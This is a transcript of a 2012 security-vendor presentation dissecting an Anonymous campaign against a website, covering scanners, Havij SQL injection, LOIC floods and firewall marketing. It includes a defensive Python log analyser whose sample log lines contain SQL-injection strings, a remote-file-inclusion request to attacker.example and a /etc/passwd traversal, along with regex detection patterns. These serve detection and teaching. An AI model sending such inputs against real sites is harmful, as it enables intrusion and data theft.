The Anatomy and Security of an Anonymous Operation

Presentation transcript:

The Anatomy and Security of an Anonymous Operation July 2012 Terry Ray – VP WW Security Engineering

What is Anonymous?

Perception: “[Anonymous is] the first Internet-based superconsciousness.” —Chris Landers, Baltimore City Paper, April 2, 2008. Hacktivists fighting for moral causes. The 99%.

Reality: “Anonymous is an umbrella for anyone to hack anything for any reason.” —New York Times, 27 Feb 2012. Targets include porn sites, Mexican drug lords, Sony, government agencies, banks, churches, law enforcement and Vladimir Putin. Anyone can be a target.

The Plot: The attack took place in 2011 over a 25-day period. Anonymous was on a deadline to breach and disrupt a website, a proactive attempt at hacktivism. 10-15 skilled hackers; several hundred to thousands of supporters.

How They Attack: The Anonymous Attack Anatomy

Anonymous Attack on Customer Site: Web Application Protection Use Case (SecureSphere Web Application Firewall presentation, slide dated May 21, 2007)

Phase I: Technical attack, scanners such as Nikto. Phase II: Technical attack, Havij SQL injection tool. Phase III: Business logic attack, LOIC application. SecureSphere stopped all phases of the attack.

Speaker notes: The first use case we are going to look at is Web application protection, and since it is an important use case, we are going to examine different Web application threats and how SecureSphere mitigated them. The first one is a multinational company that was attacked by the hacktivist group Anonymous. Imperva witnessed the assault, which occurred over a period of 25 days. It started with recruiting activities and application probes by scanners such as Nikto and Acunetix. These scans tried to uncover Web vulnerabilities. During the second phase, Anonymous turned to attack tools like the Havij SQL injection tool to attempt to hack the site. They also used anonymity services like anonymous proxies to disguise their identity. During both of these phases, Imperva blocked all attacks. When the technical attacks failed, Anonymous turned to DDoS attacks to attempt to bring down the Website. They used LOIC, or Low Orbit Ion Cannon, and a new mobile version of the attack tool to disrupt application access. Traffic spiked, but SecureSphere was able to mitigate this Web-based DDoS attack.

On the Offense

Skilled hackers—This group, around 10 to 15 individuals per campaign, have genuine hacking experience and are quite savvy. Broad use of anonymizing services (aProxy & TOR).

Nontechnical—This group can be quite large, ranging from a few dozen to a few hundred volunteers. Directed by the skilled hackers, their role is primarily to conduct DDoS attacks by either downloading and using special software or visiting websites designed to flood victims with excessive traffic.

On the Defense

Deployment line was network firewall, IDS, WAF, web servers, network anti-DoS and anti-virus.
Imperva WAF: SecureSphere WAF version 8.5, inline, high availability; ThreatRadar reputation (IP Reputation).
SSL wasn’t used; the whole website was in HTTP.

1 Recruiting and Communications

Step 1A: An “Inspirational” Video

Step 1B: Social Media Helps Recruit

Setting Up An Early Warning System

Example

2 Recon and Application Attack “Avoid strength, attack weakness: Striking where the enemy is most vulnerable.” —Sun Tzu

Step 1A: Finding Vulnerabilities

Tool #1: Vulnerability Scanners. Purpose: rapidly find application vulnerabilities. Cost: $0-$1000 per license. The specific tools: Acunetix (named a “Visionary” in a Gartner 2011 MQ) and Nikto (open source).

Hacking Tools

Tool #2: Havij. Purpose: automated SQL injection and data harvesting tool, developed solely to take data transacted by applications. Developed in Iran.

Vulnerabilities of Interest: DT (directory traversal), SQLi (SQL injection), XSS (cross-site scripting).

Comparing to Lulzsec Activity

Lulzsec was/is a team of hackers focused on breaking applications and databases. ‘New’ Lulzsec is taking credit for recent attacks (Militarysingles.com). Our observations have a striking similarity to the attacks employed by Lulzsec during their campaign. Lulzsec used: SQL Injection, Cross-site Scripting and Remote File Inclusion (RFI/LFI). [Slide sample: RFI against index.php]

Speaker notes: Additionally, the ADC found that 29 percent of the attack events originated from the 10 most active attack sources. While filtering based on geography is far from reliable, sorting traffic based on reputation is viable. Even though the identity of the host that initiated an attack is not necessarily indicative of the identity of the attacker that controls it, we have investigated the geographic distribution of the attack-initiating hosts as determined by their IP addresses. For all attack types the attackers were spread around the world, but most of the attacks (both in absolute numbers and counting the distinct hosts initiating the attacks) were from the United States. A significant portion of the SQL Injection attacks we observed came from a relatively small number of Chinese hosts (see Figure 3). The leading source countries were rather consistent across all attack types. The average ratio of attacks to attacking hosts is about 10:1 for RFI, 25:1 for SQL injection and 40:1 for DT.

Lulzsec Activity Samples

1 infected server ≈ 3000 bot-infected PCs’ power. 8000 infected servers ≈ 24 million bot-infected PCs’ power.

Automation is Prevailing

In one hacker forum, it was boasted that one hacker had found 5012 websites vulnerable to SQLi through automation tools. Note: due to automation, hackers can be effective in small groups, i.e. Lulzsec. Automation also means that attacks are equal opportunity offenders: they don’t discriminate between well-known and unknown sites.

Speaker notes: Most notably, the ADC found that attack automation is prevailing. Modern botnets scan and probe the Web seeking to exploit vulnerabilities and extract valuable data, conduct brute force password attacks, disseminate spam, distribute malware, and manipulate search engine results. These botnets operate with the same comprehensiveness and efficiency used by Google spiders to index websites. As the recent Lulzsec episode highlighted, hackers can be effective in small groups. Further, automation also means that attacks are equal opportunity offenders; they do not discriminate between well-known and unknown sites or enterprise-level and non-profit organizations. According to the study, websites experience an average of 27 attacks per hour, or about once every two minutes. However, 27 attacks per hour is only an average. When sites come under automated attack, the target can experience up to 25,000 attacks per hour, or 7 per second.

US is the ‘visible’ source of most attacks

During the Anonymous attack, 74% of the technical attack traffic originated from anonymizing services and was detected by IP reputation.
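The three technical phases described above (scanner probes, Havij SQL injection, RFI/DT requests), the ADC's attacks-to-hosts ratio, and the share of attack traffic coming from anonymizing services can all be checked against a web server's own access log. The following is an added example, not code from Imperva or from this presentation: it classifies constructed combined-format log lines, computes the attacks-per-host ratio per class, measures what fraction of technical attack events come from a stand-in IP-reputation list of anonymizers, and flags sources that exceed a per-second request threshold as LOIC-style flood candidates. The log lines, the anonymizer list and the threshold are all constructed assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote
# Constructed sample (not real traffic): combined-format access-log lines standing in
# for the talk's phases: scanner recon, Havij SQLi, and RFI/DT probes.
SAMPLE_LOG = [
    '203.0.113.10 - - [01/Jul/2012:10:00:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 0 "-" "Mozilla/5.00 (Nikto/2.1.4)"',
    '203.0.113.10 - - [01/Jul/2012:10:00:02 +0000] "GET /admin/ HTTP/1.1" 404 0 "-" "Mozilla/5.00 (Nikto/2.1.4)"',
    '198.51.100.7 - - [01/Jul/2012:10:05:00 +0000] "GET /item.php?id=1%27%20AND%201=1 HTTP/1.1" 200 0 "-" "Havij"',
    '198.51.100.7 - - [01/Jul/2012:10:05:01 +0000] "GET /item.php?id=1%27%20UNION%20SELECT%201,2 HTTP/1.1" 500 0 "-" "Havij"',
    '192.0.2.55 - - [01/Jul/2012:10:06:00 +0000] "GET /index.php?page=http://attacker.example/s.txt HTTP/1.1" 200 0 "-" "curl/7.21"',
    '192.0.2.55 - - [01/Jul/2012:10:06:01 +0000] "GET /dl.php?f=../../../../etc/passwd HTTP/1.1" 403 0 "-" "curl/7.21"',
]
# Constructed LOIC-style HTTP flood: one source sending 30 requests within a single second.
SAMPLE_LOG += ['192.0.2.200 - - [01/Jul/2012:10:10:00 +0000] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0"'] * 30

ANONYMIZER_IPS = {"198.51.100.7", "192.0.2.55"}  # constructed stand-in for an aProxy/TOR reputation feed
FLOOD_THRESHOLD = 20  # requests per source per second; tune to the site's measured baseline
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')
SQLI_RE = re.compile(r"'\s*(?:and|or|union)\b", re.I)  # quote followed by a SQL keyword
RFI_RE = re.compile(r"=(?:https?|ftp)://", re.I)        # parameter whose value is a remote URL

def classify(ua, path):
    """Map one request to the talk's attack classes, or None for ordinary traffic."""
    ua_l, decoded = ua.lower(), unquote(path)
    if "nikto" in ua_l or "acunetix" in ua_l:
        return "scanner"
    if "havij" in ua_l or SQLI_RE.search(decoded):
        return "sqli"
    if RFI_RE.search(decoded):
        return "rfi"
    if "../" in decoded:
        return "dt"
    return None

def analyze(lines):
    # events: attack events per class; hosts: distinct sources per class;
    # per_second: requests per (source, second) used for flood detection.
    events, hosts, per_second, from_anon = Counter(), defaultdict(set), Counter(), 0
    for line in lines:
        if not (m := LOG_RE.match(line)):
            continue  # skip lines that are not in combined log format
        ip, ts, _method, path, _status, ua = m.groups()
        per_second[(ip, ts)] += 1
        cls = classify(ua, path)
        if cls:
            events[cls] += 1
            hosts[cls].add(ip)
            from_anon += int(ip in ANONYMIZER_IPS)
    technical = sum(events.values())
    return {
        "events": dict(events),
        "attacks_per_host": {c: events[c] / len(hosts[c]) for c in events},
        "anonymizer_share": from_anon / technical if technical else 0.0,
        "flood_sources": sorted({ip for (ip, _), n in per_second.items() if n >= FLOOD_THRESHOLD}),
    }
```

On real logs the user-agent checks are only a first pass, since tools can spoof the header; the rate-based flood check and the reputation share do not depend on it.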

Stop Automated Attacks

Mitigation, AppSec 101: code fixing; dork yourself; blacklist + IP reputation; WAF; WAF + VA (vulnerability assessment).

3 Application DDoS

LOIC Facts

Low Orbit Ion Cannon (LOIC). Purpose: DDoS. Mobile and JavaScript variations. Other variations: HOIC, GOIC, RefRef.
LOIC downloads: 2011: 381,976. 2012 (through May 10): 374,340. June 2012: ~98% of 2011’s downloads!

Anonymous and LOIC in Action [chart: transactions per second, LOIC in action vs. average site traffic]

Application DDoS

“The effectiveness of RefRef is due to the fact that it exploits a vulnerability in a widespread SQL service. The flaw is apparently known but not widely patched yet. The tool's creators don't expect their attacks to work on a high-profile target more than a couple of times before being blocked, but they don't believe organizations will rush to patch this flaw en masse before being hit.” —The Hacker News, July 30, 2011

But That Much Sophistication Isn’t Always Required

But That Much Sophistication Isn’t Always Required Meet your target URL

4 Non-Mitigations

I have IPS and NGFW, am I safe?

IPS and NGFWs do not prevent web application attacks. Don’t confuse “application aware marketing” with Web Application Security. WAFs at a minimum must include the following to protect web applications: Web-App Profile; Web-App Signatures; Web-App Protocol Security; Web-App DDoS Security; Web-App Cookie Protection; Anonymous Proxy/TOR IP Security; HTTPS (SSL) visibility; Security Policy Correlation.

I have IPS and NGFW, am I safe? (continued)

IPS and NGFWs do not prevent web application attacks. Don’t confuse “application aware marketing” with Web Application Security. However, IPS and NGFWs at best only partially support the items in red on the slide: Web-App Profile; Web-App Signatures; Web-App Protocol Security; Web-App DDoS Security; Web-App Cookie Protection; Anonymous Proxy/TOR IP Security; HTTPS (SSL) visibility; Security Policy Correlation.

Recent attacker targets: Yahoo Voice, LinkedIn, Last.fm, Formspring, eHarmony, US Department of Justice, US Copyright Office, FBI, MPAA, Warner Brothers, RIAA, HADOPI, BMI, SOHH, Office of the AU Prime Minister, AU House of Parliament, AU Department of Communications, Swiss bank PostFinance, Egyptian Government, Itau, Banco de Brazil, US Senate, Caixa, Church of Scientology, Muslim Brotherhood, Zappos.com, MilitarySingles.com, Amazon, Austria Federal Chancellor, HBGary Federal, Mexican Interior Ministry, Mexican Senate, Mexican Chamber of Deputies, Irish Department of Justice, Irish Department of Finance, Greek Department of Justice, Egyptian National Democratic Party, Spanish Police, Orlando Chamber of Commerce, Catholic Diocese of Orlando, Bay Area Rapid Transit, PayPal, Mastercard, Visa.

How many of these organizations have AV, IPS and Next Generation Firewalls? Why are the attacks successful when these technologies claim to prevent them?

5 Demo